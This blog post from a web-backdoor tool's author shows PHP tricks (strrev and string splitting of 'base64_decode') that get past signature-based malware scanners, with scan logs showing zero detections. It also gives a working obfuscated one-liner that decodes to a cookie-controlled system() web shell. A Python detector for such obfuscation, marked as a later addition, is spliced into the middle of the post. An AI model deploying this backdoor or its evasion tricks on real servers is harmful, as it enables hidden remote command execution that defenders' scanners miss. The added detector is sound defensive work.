Bypass base64 decoder detection

Almost two weeks after WeBaCoo’s release, I started to organize the results from various tests under different protection/detection tools for a comprehensive writeup. Something that drew my attention is how easily some malware scanning tools mark WeBaCoo’s generated backdoor code as a “threat”. A simple use of the base64 decoder function is enough to trigger the scanner’s content matching rulesets, no matter what data is being processed. In addition to this strict approach, I recently came across on the Internet some official web backdoor detection tutorials that include content matching checks for the decoder function. These two things led me to a small research effort for finding tricks that bypass such content matching mechanisms.

A list of tools and scripts that marked WeBaCoo’s generated code as a “threat” based on the use of the base64 decoder is as follows (check the first image gallery at the end of the post for report screenshots):

After inspecting how the above tools work, I thought of two main methods that can be used to trick the base64 decoder content matching rules: string reversing and string splitting. These two methods can be combined to create trickier code, always keeping the number of characters used as low as possible. WeBaCoo generates PHP backdoor code, so I will work through these methods in PHP, although the same concept applies to other languages too.

 

String Reversing

Luckily for us, PHP provides the strrev() function to easily reverse a string. Knowing that base64_decode was the function name that triggered the above tools, strrev can be used to trick them. Let’s form an example to see that the concept works before proceeding to the backdoor alterations.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//$bd="base64_decode"
$bd=strrev("edoced_46esab");
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$bd(\$data);");
?>

root@testbed:~# php reverse.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/reverse.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4332): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4332): {scan} building file list for /var/www/pwn/reverse.php, this might take awhile...
maldet(4332): {scan} file list completed, found 1 files...
maldet(4332): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4332): {scan} scan of /var/www/pwn/reverse.php (1 files) in progress...

maldet(4332): {scan} scan completed on /var/www/pwn/reverse.php: files 1, malware hits 0, cleaned hits 0
maldet(4332): {scan} scan report saved, to view run: maldet --report 121111-2034.4332

 

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks that are later concatenated to form the function name.

<?php
//base64 encode of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
 
//split into two chunks
$ac="base6";
$bc="4_decode";
 
//concat the chunks
$cc=$ac.$bc;
 
//print decoded data
//eval is used to evaluate string as PHP code
eval("echo \$cc(\$data);");
?>

root@testbed:~# php split.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/split.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4509): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4509): {scan} building file list for /var/www/pwn/split.php, this might take awhile...
maldet(4509): {scan} file list completed, found 1 files...
maldet(4509): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4509): {scan} scan of /var/www/pwn/split.php (1 files) in progress...

maldet(4509): {scan} scan completed on /var/www/pwn/split.php: files 1, malware hits 0, cleaned hits 0
maldet(4509): {scan} scan report saved, to view run: maldet --report 121111-2049.4509

 

Knowing that both of the above techniques defeat content matching on the decoder’s function name, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination, which is used in the new backdoor code. I will run the same tests to see whether the new backdoor code passes all of them. You can see the results in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>
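The two tricks above only defeat a scanner that matches the literal string “base64_decode”. A detector that resolves the obfuscation before matching sees through both, and through their combination. The following Python script is an added example from the defender’s side; it is not part of the original post or of WeBaCoo. It tokenizes a PHP snippet, evaluates the small expression grammar the post relies on (string literals, `.` concatenation, `strrev()`, and variables assigned earlier in the file), and flags any assignment that resolves to a watched function name, any variable-function call through such a name (including `\$bd(` inside a string handed to `eval`), and any `eval(` call. The sample snippets are constructed to reproduce the post’s reverse.php, split.php and combined one-liner, and the `WATCHED` set is an assumption of this example, not a maldet or ClamAV signature.

```python
import re

# Function names worth flagging once string obfuscation has been undone
# (assumed watch list for this example; base64_decode is the name the post hides).
WATCHED = {"base64_decode", "eval", "system", "shell_exec", "passthru", "exec"}

# Constructed samples mirroring the post's three snippets plus a benign one.
SAMPLE_REVERSE = r'''<?php
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
$bd=strrev("edoced_46esab");
eval("echo \$bd(\$data);");
?>'''
SAMPLE_SPLIT = r'''<?php
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
$ac="base6";
$bc="4_decode";
$cc=$ac.$bc;
eval("echo \$cc(\$data);");
?>'''
SAMPLE_COMBINED = r'''<?php $c=strrev("edoced_4"."6esab");eval($c("aGVsbG8=")); ?>'''
SAMPLE_CLEAN = r'''<?php echo strrev("hello"); $x = "base" . "ball"; ?>'''

TOKEN_RE = re.compile(r"""
    (?P<STRING>"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')
  | (?P<VAR>\$[A-Za-z_]\w*)
  | (?P<IDENT>[A-Za-z_]\w*)
  | (?P<OP>[().;=])
  | (?P<SKIP>\s+|<\?php|\?>|//[^\n]*)
""", re.VERBOSE)
# A variable-function call written inside a string destined for eval: "\$bd("
DYN_CALL_IN_STRING = re.compile(r"\\?\$([A-Za-z_]\w*)\s*\(")


def tokenize(src):
    """Split PHP source into (kind, text) tokens; unknown characters become OTHER."""
    pos, tokens = 0, []
    while pos < len(src):
        m = TOKEN_RE.match(src, pos)
        if m is None:
            tokens.append(("OTHER", src[pos]))
            pos += 1
            continue
        if m.lastgroup != "SKIP":
            tokens.append((m.lastgroup, m.group()))
        pos = m.end()
    return tokens


class _Parser:
    """Recursive-descent evaluator for: literal | $var | strrev(expr) | expr . expr."""

    def __init__(self, tokens, env):
        self.toks, self.env, self.i = tokens, env, 0

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def expr(self):
        value = self.term()
        while self.peek() == ("OP", "."):          # concatenation chain
            self.i += 1
            rhs = self.term()
            value = None if value is None or rhs is None else value + rhs
        return value

    def term(self):
        kind, text = self.peek()
        self.i += 1
        if kind == "STRING":
            return text[1:-1]                       # strip the quotes
        if kind == "VAR":
            return self.env.get(text)               # None if never resolved
        if kind == "IDENT" and self.peek() == ("OP", "("):
            self.i += 1
            inner = self.expr()
            if self.peek() == ("OP", ")"):
                self.i += 1
            return inner[::-1] if text == "strrev" and inner is not None else None
        return None                                 # anything else is opaque


def evaluate(tokens, env):
    """Resolve an expression to a string, or None when it uses something unknown."""
    parser = _Parser(tokens, env)
    value = parser.expr()
    return value if parser.i == len(tokens) else None


def check_statement(toks, env):
    """Return findings for one statement and record resolved assignments in env."""
    findings = []
    if len(toks) > 2 and toks[0][0] == "VAR" and toks[1] == ("OP", "="):
        value = evaluate(toks[2:], env)
        if value is not None:
            env[toks[0][1]] = value
            if value in WATCHED:
                findings.append(("obfuscated_name", toks[0][1], value))
    for i, (kind, text) in enumerate(toks):
        follows_paren = i + 1 < len(toks) and toks[i + 1] == ("OP", "(")
        if kind == "IDENT" and text == "eval" and follows_paren:
            findings.append(("eval_call", "", "eval"))
        if kind == "VAR" and follows_paren and env.get(text) in WATCHED:
            findings.append(("dynamic_call", text, env[text]))
        if kind == "STRING":
            for m in DYN_CALL_IN_STRING.finditer(text):
                var = "$" + m.group(1)
                if env.get(var) in WATCHED:
                    findings.append(("dynamic_call", var, env[var]))
    return findings


def scan(src):
    """Return (kind, variable, resolved_name) findings for a PHP snippet."""
    env, findings, statement = {}, [], []
    for tok in tokenize(src) + [("OP", ";")]:
        if tok == ("OP", ";"):
            findings.extend(check_statement(statement, env))
            statement = []
        else:
            statement.append(tok)
    return findings


if __name__ == "__main__":
    for name, sample in [("reverse", SAMPLE_REVERSE), ("split", SAMPLE_SPLIT),
                         ("combined", SAMPLE_COMBINED), ("clean", SAMPLE_CLEAN)]:
        print(name, scan(sample))
```

Running the script reports the resolved `base64_decode` name and the dynamic call through it for all three obfuscated samples and nothing for the benign one. The point for a scanner author is that matching on the literal function name is the weak step; normalizing string expressions first (and, more generally, treating `eval` of a variable-function call as suspicious on its own) closes the gap the post demonstrates.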

 

These two techniques will be implemented in WeBaCoo’s next release once I settle on the most efficient way to use them.

 

Initial Code Report Results

New Code Report Results

DISCLAIMER: I’m not responsible for what you do with this info. This information is for educational purposes only.

A. Bechtsoudis

2 Comments

ivan morales, September 7th, 2012 at 16:58

I use WeBaCoo, it’s very useful.. but maybe you can code in the same .pl to add a custom shell.. and after, your tool can obfuscate it.. because your tool is undetectable… thanks in advance

anestisb, September 11th, 2012 at 10:32

I’m not sure that I understood your comment. What exactly is the addition you are suggesting?